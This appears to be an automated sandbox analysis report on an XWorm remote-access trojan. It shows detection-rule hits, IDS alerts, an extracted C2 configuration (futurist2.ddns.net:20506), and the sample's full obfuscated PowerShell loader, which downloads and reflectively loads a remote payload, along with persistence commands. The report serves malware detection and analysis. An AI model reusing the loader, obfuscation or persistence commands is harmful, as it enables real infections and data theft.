            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\k4STQvJ6rV.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\k4STQvJ6rV.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\k4STQvJ6rV.vbs", ProcessId: 7856, ProcessName: wscript.exe
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\XClient.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 2396, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 2396, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\k4STQvJ6rV.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\k4STQvJ6rV.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\k4STQvJ6rV.vbs", ProcessId: 7856, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')'), CommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')'), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7944, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')'), ProcessId: 8096, ProcessName: powershell.exe
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-07T08:56:24.034666+020020204231Exploit Kit Activity Detected188.114.97.3443192.168.2.849709TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-07T08:56:23.880852+020028410751Malware Command and Control Activity Detected192.168.2.849709188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-07T08:57:48.223217+020028559241Malware Command and Control Activity Detected192.168.2.84972593.123.39.7620506TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000009.00000002.1617406175.000001FFE6961000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["futurist2.ddns.net"], "Port": "20506", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 9.2.powershell.exe.1ffe69692d0.0.raw.unpackString decryptor: futurist2.ddns.net
            Source: 9.2.powershell.exe.1ffe69692d0.0.raw.unpackString decryptor: 20506
            Source: 9.2.powershell.exe.1ffe69692d0.0.raw.unpackString decryptor: <123456789>
            Source: 9.2.powershell.exe.1ffe69692d0.0.raw.unpackString decryptor: <Xwormmm>
            Source: 9.2.powershell.exe.1ffe69692d0.0.raw.unpackString decryptor: HELPER
            Source: 9.2.powershell.exe.1ffe69692d0.0.raw.unpackString decryptor: USB.exe
            Source: 9.2.powershell.exe.1ffe69692d0.0.raw.unpackString decryptor: %LocalAppData%
            Source: 9.2.powershell.exe.1ffe69692d0.0.raw.unpackString decryptor: XClient.exe
            Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49712 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49709 version: TLS 1.2
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.1685514693.00007FFB4B040000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: root:\Windows\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: ?;oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2607292773.000000000605B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
